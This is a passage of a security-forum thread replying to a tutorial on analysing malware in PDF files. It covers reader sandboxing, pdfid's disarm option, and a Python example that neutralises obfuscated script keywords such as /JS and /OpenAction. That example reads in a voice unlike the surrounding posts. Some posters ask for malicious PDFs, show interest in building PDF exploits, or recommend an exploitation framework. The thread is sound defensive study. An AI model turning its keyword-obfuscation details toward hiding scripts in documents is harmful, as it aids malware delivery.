  • *
  • Posts: 19
  • Cookies: -6
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #3 on: October 01, 2013, 08:32:17 am »
I agree, great tutorial.

+1

Offline Stackprotector

  • Administrator
  • Titan
  • *
  • Posts: 2515
  • Cookies: 205
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #4 on: October 01, 2013, 09:51:51 pm »
+1 for trying, now format it :)
~Factionwars

Offline p_2001

  • Royal Highness
  • ****
  • Posts: 684
  • Cookies: -64
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #5 on: October 02, 2013, 08:03:06 pm »
Nice share, but the sandbox will block everything malicious in the PDF reader. I had some malicious PDFs from 2008; they don't execute anymore.
Dunno if the sandbox is broken yet.

Offline hydroxypropylcellulose

  • /dev/null
  • *
  • Posts: 19
  • Cookies: -6
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #6 on: October 02, 2013, 08:45:36 pm »
Quote
Nice share, but the sandbox will block everything malicious in the PDF reader. I had some malicious PDFs from 2008; they don't execute anymore.
Dunno if the sandbox is broken yet.

If you scan it using VirusTotal, that service checks for abnormalities and scripts in the document too.
« Last Edit: October 02, 2013, 08:45:48 pm by hydroxypropylcellulose »

Offline Alkapone

  • NULL
  • Posts: 2
  • Cookies: 4
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #7 on: October 02, 2013, 11:25:47 pm »
Can you send me those PDFs?

And you don't need a sandbox with this,

because you can disarm the JavaScript in the Adobe PDF reader.

The command

Code:
python pdfid.py --disarm testfile.pdf

will manually change the /Javascript into /J47d7xnsnsScrript,

therefore not allowing the Adobe PDF JavaScript engine to execute.

Because in the Adobe PDF reader everything is god, I can't remember the word.

If it has /Javascript /javascript /JS, those will execute,

but /Ja8d7s899, stuff like that, will not execute.
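The disarm step described in this reply (and in the --disarm section of the first post) can be reproduced in a few lines. The following is an added example, not pdfid's own code: it swaps the letter case of every name that resolves to a script keyword, keeping #xx escapes as escapes so the byte count of the file, and with it every xref offset, is unchanged. Because PDF name lookups are case-sensitive, a reader no longer resolves the swapped name to /JavaScript, /JS or /OpenAction, while an analyst can still read it. The SAMPLE fragment is constructed for the example; its obfuscated spellings are the ones from the pdfid output in the first post, and the renames the script produces match the three lines pdfid printed there.

```python
"""Case-swap disarming of script keywords, as pdfid --disarm does (added example)."""
import re

KEYWORDS = [b"/JS", b"/JavaScript", b"/OpenAction", b"/AA", b"/Launch", b"/RichMedia"]
NAME_RE = re.compile(rb"/[^\s/<>\[\]{}()%]+")      # a PDF name token
ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")       # a #xx hex escape inside a name


def decode_name(raw: bytes) -> bytes:
    """Resolve #xx escapes so an obfuscated spelling compares equal to the keyword."""
    return ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def swap_name_case(raw: bytes) -> bytes:
    """Swap the case of each letter in a name token, keeping #xx escapes as
    escapes: b'/Open#41#63tion' -> b'/oPEN#61#43TION' (same length)."""
    # 1. swap the letter hidden inside each escape and re-encode it as an escape
    swapped = ESCAPE_RE.sub(
        lambda m: b"#%02x" % ord(chr(int(m.group(1), 16)).swapcase()), raw)
    # 2. swap the literal letters, leaving the hex digits of the escapes untouched
    parts = re.split(rb"(#[0-9A-Fa-f]{2})", swapped)
    return b"".join(p if p.startswith(b"#") else p.swapcase() for p in parts)


def disarm(pdf: bytes):
    """Return the disarmed document and the list of (before, after) renames."""
    changes = []

    def rename(m):
        raw = m.group(0)
        if decode_name(raw) in KEYWORDS:        # only keyword names are touched
            new = swap_name_case(raw)
            changes.append((raw, new))
            return new
        return raw

    return NAME_RE.sub(rename, pdf), changes


def recognised_keywords(pdf: bytes) -> list:
    """Names a reader would still resolve to a script keyword (case-sensitive match)."""
    return [decode_name(n) for n in NAME_RE.findall(pdf) if decode_name(n) in KEYWORDS]


# Constructed fragment reusing the obfuscated spellings from the post's pdfid output
SAMPLE = (b"5 0 obj\n<< /#54#79pe /#41#63#74i#6fn /S /J#61va#53#63r#69#70#74"
          b" /#4a#53 6 0 R >>\nendobj\n"
          b"1 0 obj\n<< /Type /Catalog /Open#41#63tion 5 0 R /AA << /O 7 0 R >> >>\nendobj\n")

if __name__ == "__main__":
    out, changes = disarm(SAMPLE)
    for before, after in changes:
        print("%s -> %s" % (before.decode(), after.decode()))
    print("still recognised by a reader:", recognised_keywords(out))
    print("size unchanged:", len(out) == len(SAMPLE))
```

Disarming is a neutralisation step for safe handling, not a detection one: run it on a copy, keep the original for analysis, and treat the renamed names as the indicator list for the sample.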


Offline p_2001

  • Royal Highness
  • ****
  • Posts: 684
  • Cookies: -64
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #8 on: October 03, 2013, 12:26:57 am »
Quote
Can you send me those PDFs?

And you don't need a sandbox with this,

because you can disarm the JavaScript in the Adobe PDF reader.

The command

Code:
python pdfid.py --disarm testfile.pdf

will manually change the /Javascript into /J47d7xnsnsScrript,

therefore not allowing the Adobe PDF JavaScript engine to execute.

Because in the Adobe PDF reader everything is god, I can't remember the word.

If it has /Javascript /javascript /JS, those will execute,

but /Ja8d7s899, stuff like that, will not execute.

I mean that while learning this is fun, the reader sandbox won't let any embedded exploit make changes to the system. So trying to exploit the JS is useless now, unless you have some way to escape the sandbox.

Offline GoldDust

  • /dev/null
  • *
  • Posts: 17
  • Cookies: 0
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #9 on: November 15, 2013, 10:05:22 am »
Great tutorial. Thank you!

-GD

Offline Fed0t

  • NULL
  • Posts: 3
  • Cookies: -4
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #10 on: April 19, 2014, 07:21:53 pm »
I am interested in how they make these PDF exploits!

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #11 on: April 20, 2014, 01:42:03 am »
Quote
Can you send me those PDFs?

And you don't need a sandbox with this,

because you can disarm the JavaScript in the Adobe PDF reader.

The command

Code:
python pdfid.py --disarm testfile.pdf

will manually change the /Javascript into /J47d7xnsnsScrript,

therefore not allowing the Adobe PDF JavaScript engine to execute.

Because in the Adobe PDF reader everything is god, I can't remember the word.

If it has /Javascript /javascript /JS, those will execute,

but /Ja8d7s899, stuff like that, will not execute.

Seriously, you don't need to start newlines early and double space. I don't understand why people feel the need to attack the Enter button so much. Just let the editor do it on its own. Otherwise nice contribution n' shit.
« Last Edit: April 20, 2014, 02:08:28 am by lucid »

Offline Architect

  • Sir
  • ***
  • Posts: 428
  • Cookies: 56
  • STFU
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #12 on: April 20, 2014, 03:57:44 am »
This post was actually really helpful, I tested this on some SET obfuscated files and it works. I also have to recommend the "Veil Framework" tool for exploitation. 9/10 great post.